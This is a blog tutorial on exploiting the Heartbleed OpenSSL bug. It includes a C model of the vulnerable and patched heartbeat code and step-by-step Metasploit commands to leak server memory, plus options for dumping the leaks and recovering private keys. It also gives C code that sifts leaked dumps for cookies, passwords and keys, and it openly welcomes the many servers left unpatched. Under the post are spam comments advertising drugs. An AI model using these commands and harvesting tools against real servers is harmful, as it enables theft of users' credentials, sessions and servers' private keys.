
Hacking the Heartbleed Vulnerability


In recent weeks, the Heartbleed vulnerability in OpenSSL has been dominating the information security headlines. It lets an attacker pull data out of a server’s memory, up to 64K at a time, that may contain authentication credentials, session cookies, the server’s private key, and personally identifiable information (PII) usable for identity theft. As a result, websites around the world have been scrambling to close this hole. Fortunately for us, many still have not, and some may never be patched.

Some background: OpenSSL is the TLS/SSL library behind HTTPS on a large share of the world’s web servers, and the point of HTTPS is that data traveling over it is encrypted and protected from tampering. TLS also has a heartbeat extension (RFC 6520), which is a keep-alive: one side sends a short payload and the other echoes the same bytes back, proving that the peer is still there and the connection is usable. It’s kind of like one machine telling the other, “Yes, I’m still here, you can keep sending.”

The Heartbleed bug (CVE-2014-0160, present in OpenSSL 1.0.1 through 1.0.1f and fixed in 1.0.1g) is in how the server handles that echo. Each heartbeat request carries a two-byte length field stating how long its payload is, and the vulnerable code trusted that field without checking it against the size of the record actually received. An attacker sends a request with a single byte of payload but a length field claiming up to 64K (65535 bytes); the server copies that many bytes starting at the request and sends them back. The extra bytes are not random: they are whatever happened to sit next to the request in the server process’s heap, which is why cookies, passwords and key material from other connections turn up in the reply.
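To make that missing length check concrete, here is an added example in C (not code from the original post, and not OpenSSL’s own source): a miniature model of the heartbeat handler with the vulnerable logic beside the patched logic. The record layout follows RFC 6520 (one type byte, a two-byte payload length, the payload, then at least 16 bytes of padding). Everything else, the function names, the simulated heap, and the staged “Cookie:” secret, is constructed for the example, and the heap is one fixed buffer so the over-read stays inside a valid allocation and the program is well defined.

```c
/* Added example: vulnerable vs. patched TLS heartbeat handling, modelled
   in C. Not OpenSSL code; names and the simulated heap are this example's own. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16          /* RFC 6520: at least 16 bytes of padding */
#define SIM_HEAP    4096        /* constructed: stands in for the process heap */

typedef size_t (*hb_handler)(const unsigned char *rec, size_t rec_len,
                             unsigned char *resp);

/* Constructed secret that "another session" left in memory near the request. */
static const unsigned char SECRET[] = "Cookie: session=0123456789abcdef";
#define SECRET_LEN (sizeof SECRET - 1)

static unsigned char sim_heap[SIM_HEAP];

/* Encode a heartbeat request. claimed_len is what the length field says;
   real_len is how many payload bytes are actually sent. Returns record size. */
static size_t build_heartbeat(unsigned char *out, uint16_t claimed_len,
                              const unsigned char *payload, size_t real_len)
{
    out[0] = HB_REQUEST;
    out[1] = (unsigned char)(claimed_len >> 8);
    out[2] = (unsigned char)(claimed_len & 0xff);
    memcpy(out + 3, payload, real_len);
    memset(out + 3 + real_len, 0, HB_PADDING);
    return 3 + real_len + HB_PADDING;
}

/* Vulnerable handler (models OpenSSL 1.0.1 to 1.0.1f): never compares the
   claimed length with the record length, so memcpy runs past the request
   and copies neighbouring memory into the reply. */
static size_t vuln_heartbeat(const unsigned char *rec, size_t rec_len,
                             unsigned char *resp)
{
    (void)rec_len;                              /* ignored: that is the bug */
    if (rec[0] != HB_REQUEST) return 0;
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    resp[0] = HB_RESPONSE;
    resp[1] = rec[1];
    resp[2] = rec[2];
    memcpy(resp + 3, rec + 3, payload);         /* over-read when claimed > real */
    memset(resp + 3 + payload, 0, HB_PADDING);  /* OpenSSL uses random padding */
    return 3 + payload + HB_PADDING;
}

/* Patched handler (the 1.0.1g fix): drop any request whose claimed length
   does not fit inside the record that was actually received. */
static size_t fixed_heartbeat(const unsigned char *rec, size_t rec_len,
                              unsigned char *resp)
{
    if (rec_len < 1 + 2 + HB_PADDING) return 0;
    if (rec[0] != HB_REQUEST) return 0;
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    if ((size_t)1 + 2 + payload + HB_PADDING > rec_len) return 0;  /* the fix */
    resp[0] = HB_RESPONSE;
    resp[1] = rec[1];
    resp[2] = rec[2];
    memcpy(resp + 3, rec + 3, payload);
    memset(resp + 3 + payload, 0, HB_PADDING);
    return 3 + payload + HB_PADDING;
}

/* Stage a one-byte request at the start of the simulated heap, plant the
   secret 200 bytes further on, run the handler and return the reply length.
   *leaked becomes 1 if the reply contains the secret. claimed_len is capped
   so the simulated over-read cannot leave sim_heap. */
static size_t exercise(hb_handler handler, uint16_t claimed_len, int *leaked)
{
    static unsigned char resp[3 + 65535 + HB_PADDING];
    if (leaked) *leaked = 0;
    if ((size_t)3 + claimed_len > SIM_HEAP) return 0;
    memset(sim_heap, 'A', sizeof sim_heap);
    size_t rec_len = build_heartbeat(sim_heap, claimed_len,
                                     (const unsigned char *)"x", 1);
    memcpy(sim_heap + 200, SECRET, SECRET_LEN);
    size_t n = handler(sim_heap, rec_len, resp);
    for (size_t i = 0; i + SECRET_LEN <= n; i++)
        if (memcmp(resp + i, SECRET, SECRET_LEN) == 0) { if (leaked) *leaked = 1; break; }
    return n;
}

/* Small wrappers so each outcome is a single return value. */
static size_t reply_len(hb_handler h, uint16_t claimed) { return exercise(h, claimed, NULL); }
static int leaks(hb_handler h, uint16_t claimed) { int l; exercise(h, claimed, &l); return l; }

int main(void)
{
    printf("vulnerable, claimed 1024, sent 1: %zu-byte reply, secret leaked: %d\n",
           reply_len(vuln_heartbeat, 1024), leaks(vuln_heartbeat, 1024));
    printf("patched,    claimed 1024, sent 1: %zu-byte reply (0 = request dropped)\n",
           reply_len(fixed_heartbeat, 1024));
    printf("patched,    honest 1-byte request: %zu-byte reply, leaked: %d\n",
           reply_len(fixed_heartbeat, 1), leaks(fixed_heartbeat, 1));
    return 0;
}
```

The claimed length is 16 bits, which is where the “64K” figure comes from: a single request can pull at most 65535 bytes, and only from the memory immediately after the heartbeat buffer. Adjust the planted offset or the claimed length in `exercise` to see the leak appear and disappear at the exact boundary.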

In this tutorial, I’ll show you a simple way to get OpenSSL to spill the contents of its memory and possibly hand us users’ credentials and other information.

Step 1 – Update Metasploit

The first step is to update Metasploit to get the new auxiliary module for Heartbleed. Type:

  • kali > msfupdate

Metasploit will then go through the long and slow process of updating its modules and framework. Be patient here; it takes a while.

When you are finally returned to the Kali prompt, the update has completed.

Step 2 – Start Metasploit

Now, we need to start the Metasploit console. At any terminal prompt, type:

  • kali > msfconsole

You should be greeted with a screen like that below.

Step 3 – Find Heartbleed

Now, we need to find the new Heartbleed module. We can use the built-in search feature in Metasploit. Type:

  • search heartbleed

This should bring up two auxiliary modules for Heartbleed. Select the first one as I’ve highlighted below.

Step 4 – Use Auxiliary Module

Next, we need to load this module (it is an auxiliary scanner, not a payload). Simply type:

  • use auxiliary/scanner/ssl/openssl_heartbleed

This will load the heartbleed module.

Whenever I am using a new module, I like to look at the info page. Once we have loaded the module, type:

  • msf > info

As we can see in the screenshot below, this reveals the options that need to be set in order to use this module, along with a description of the module and its available actions.

Step 5 – Set Options

Although this module has numerous options, the critical one is RHOSTS (notice the plural: as a scanner module it accepts a single host, a range, or a list). RPORT defaults to 443, so change it if the TLS service listens elsewhere. The module’s default action, SCAN, reports whether each host is vulnerable; the DUMP action saves the leaked memory to a file (Metasploit loot) for searching offline, and KEYS tries to reassemble the server’s private key from repeated leaks. Let’s set RHOSTS to a target website I set up on my network that is still vulnerable to Heartbleed.

  • msf > set RHOSTS 192.168.1.169

Step 6 – Run the Module

Finally, set the option VERBOSE to true. This makes the module print the leaked data it receives rather than only a vulnerable/not vulnerable verdict.

  • msf > set verbose true

And now let’s run it:

  • msf > run

As you can see in the screenshot below, the server leaked about 64K bytes of what was in its memory.

Step 7 – Success

If credentials, personally identifiable information (PII), or the server’s private key had been sitting in that region of memory, they would have come back as well. Each request returns only what happens to lie next to the heartbeat buffer at that moment, so the contents vary from one request to the next. Running the module repeatedly (the DUMP action saves each leak so it can be searched offline) collects more of what passes through the server process’s heap. It will not recover everything that ever crossed RAM, but against a busy server it routinely turns up session cookies and request bodies, and occasionally enough key material to reconstruct the private key.
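Sifting a 64K leak by eye is slow, so here is an added example (not code from the original post or from Metasploit) of the triage step a practitioner runs over a saved dump: a strings-style pass that pulls out printable runs and flags the ones carrying a cookie, credential or key marker. The dump bytes are constructed for the example, and the marker list and function names are this example’s own choices.

```c
/* Added example: strings-style triage of a Heartbleed memory leak.
   SAMPLE_DUMP is constructed; MARKERS and function names are this example's own. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MIN_RUN  8       /* ignore printable runs shorter than this */
#define MAX_HITS 32

/* Substrings that usually mean a run is worth a human's attention. */
static const char *const MARKERS[] = {
    "Cookie:", "Set-Cookie:", "Authorization:", "password=", "passwd=",
    "-----BEGIN", NULL
};

/* Constructed leak: TLS record bytes, HTTP fragments and junk, as a
   heartbeat reply from a busy web server might contain. */
static const unsigned char SAMPLE_DUMP[] =
    "\x16\x03\x02\x00\x31\x01\x00" "GET /login HTTP/1.1\r\n"
    "Host: shop.example\r\n" "\x00\x00\x00"
    "Cookie: PHPSESSID=9a1f0c3e77b2; lang=en\r\n"
    "\x7f\x01\x02" "user=alice&password=hunter2" "\x00\x00"
    "Authorization: Basic YWxpY2U6aHVudGVyMg==" "\x00\x00"
    "random" "\x00" "noise";

/* 1 if the run contains any marker, else 0. */
static int interesting(const char *run)
{
    for (size_t i = 0; MARKERS[i] != NULL; i++)
        if (strstr(run, MARKERS[i]) != NULL) return 1;
    return 0;
}

/* Walk the dump, collect printable runs of at least MIN_RUN bytes, and
   record the offset of each run that matches a marker (up to max_hits).
   Returns the total number of matching runs, even beyond max_hits. */
static size_t triage_dump(const unsigned char *dump, size_t n,
                          size_t *hits, size_t max_hits)
{
    size_t found = 0, i = 0;
    while (i < n) {
        if (!isprint(dump[i])) { i++; continue; }
        size_t start = i;
        while (i < n && isprint(dump[i])) i++;
        size_t len = i - start;
        if (len < MIN_RUN) continue;
        char run[256];                          /* runs longer than this are truncated */
        size_t copy = len < sizeof run - 1 ? len : sizeof run - 1;
        memcpy(run, dump + start, copy);
        run[copy] = '\0';
        if (interesting(run)) {
            if (found < max_hits) hits[found] = start;
            found++;
        }
    }
    return found;
}

/* Triage the constructed sample and return how many runs were flagged. */
static size_t triage_sample(void)
{
    size_t hits[MAX_HITS];
    return triage_dump(SAMPLE_DUMP, sizeof SAMPLE_DUMP - 1, hits, MAX_HITS);
}

int main(void)
{
    size_t hits[MAX_HITS];
    size_t dump_len = sizeof SAMPLE_DUMP - 1;
    size_t n = triage_dump(SAMPLE_DUMP, dump_len, hits, MAX_HITS);
    printf("%zu suspicious run(s) in a %zu-byte dump\n", n, dump_len);
    for (size_t k = 0; k < n && k < MAX_HITS; k++) {
        printf("  @%zu: ", hits[k]);
        for (size_t j = hits[k]; j < dump_len && isprint(SAMPLE_DUMP[j]); j++)
            putchar(SAMPLE_DUMP[j]);
        putchar('\n');
    }
    return 0;
}
```

To use it on a real dump, read the loot file into a buffer and pass it to `triage_dump` in place of the sample; widen MARKERS with whatever the target application uses for its session and API tokens. The scan is deliberately byte-based, because HTTP header fragments in a leak are cut at arbitrary boundaries and rarely form complete lines.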

In my next Heartbleed post, we will start working on a scanner script to scan the world for websites and servers still vulnerable to the Heartbleed vulnerability, so make sure to come back. While you’re waiting, you can use your spare time to increase your skills in Metasploit by knowing all of the commands and hacking scripts available.

Lovepreet Singh
CEO & FOUNDER OF" FIVE RIVERS INCORPORATION - LEADING SOFTWARE & CYBER SECURITY DEVELOPMENT COMPANY" || CERTIFIED ETHICAL HACKER || FUTURE TRILLIONAIRE || FUTURISTIC || "DULL SCHOOL STUDENT" || (Follow this link to message me on WhatsApp: https://wa.me/13018426470)


25 Comments

  1. Cats And Amoxicillin Safest Place To Buy Ed Medicens [url=http://uscagsa.com]cialis for sale[/url] Pariet Levitra Cialis Espana Cialis Tadalafil Tabletas

  2. How long does a copyright last on newspaper articles?. . If a service copies newspapers articles and then posts it in a database on the Internet, is there also a copyright on the Internet content?.

  3. I just want to mention I’m all new to blogs and certainly savored your web site. More than likely I want to bookmark your site. You surely have good writings. Appreciate it for sharing your web page.

  4. I just want to mention I’m all new to blogs and certainly savored your web site. More than likely I want to bookmark your site. You surely have good writings. Appreciate it for sharing your web page.

  5. Cheapeast Progesterone Store Zithromax Sexually Transmitted Infections Kamagra Long Term Side Effects [url=http://durazy.com]buy viagra[/url] Cephalexin Dose For Dog

  6. hi!,I love your writing so a lot! share we communicate
    extra about your article on AOL? I require an expert in this area to unravel my problem.
    Maybe that’s you! Taking a look ahead to look you.

  7. It’s not my first time to go to see this website, i am visiting this web page
    daily and obtain fastidious information from here everyday.

  8. I always used to study paragraph in news papers but now as
    I am a user of net so from now I am using net for
    articles or reviews, thanks to web.

  9. Today, I went to the beach with my kids. I found
    a sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She placed the
    shell to her ear and screamed. There was a hermit crab inside
    and it pinched her ear. She never wants to go back!
    LoL I know this is entirely off topic but I had to tell someone!

  10. If you want to increase your experience simply keep visiting
    this site and be updated with the hottest gossip posted here.

  11. you are really an excellent webmaster. The site loading pace is
    incredible. It sort of feels that you are doing any distinctive trick.
    Moreover, The contents are masterpiece. you have done a fantastic process in this topic!

  12. Acquisto Viagra On Line Rischi Triexer Sildenafil Pas Cher 120 Mg [url=http://exdrugs.com]viagra[/url] Betaxolol Hpb Approved Generic Viagra In Canada Viagra Commander France

  13. It’s in point of fact a nice and helpful piece of info.
    I am satisfied that you just shared this helpful
    information with us. Please keep us informed like this.
    Thank you for sharing.

  14. This is a topic that is close to my heart…
    Best wishes! Exactly where are your contact details though?

  15. We are a group of volunteers and starting a new scheme in our
    community. Your website offered us with valuable information to work on. You’ve
    done a formidable job and our whole community will be thankful
    to you.

  16. What’s up, this weekend is fastidious for me, for the reason that
    this time i am reading this wonderful informative paragraph here at my house.

  17. Heya just wanted to give you a quick heads up and let
    you know a few of the images aren’t loading properly.
    I’m not sure why but I think its a linking issue.
    I’ve tried it in two different browsers and
    both show the same outcome.

  18. excellent issues altogether, you just received a new reader.
    What would you recommend in regards to your put up that
    you simply made some days ago? Any certain?

  19. There is definately a great deal to learn about this subject.

    I like all of the points you made.

  20. We absolutely love your blog and find almost all of
    your post’s to be precisely what I’m looking for.
    Would you offer guest writers to write content for you personally?
    I wouldn’t mind creating a post or elaborating on some of the subjects
    you write related to here. Again, awesome web site!

  21. This site was… how do I say it? Relevant!! Finally
    I’ve found something that helped me. Thanks!

  22. What’s up, I desire to subscribe for this webpage to obtain most recent updates, so where can i do it please help out.

  23. It’s really a nice and helpful piece of info. I’m happy that you shared this helpful
    info with us. Please keep us up to date like this.
    Thanks for sharing.

  24. Magnificent website. Plenty of useful info here. I
    am sending it to several pals and additionally sharing in delicious.
    And certainly, thank you on your sweat!

  25. Do you have any video of that? I’d care to find out more details.
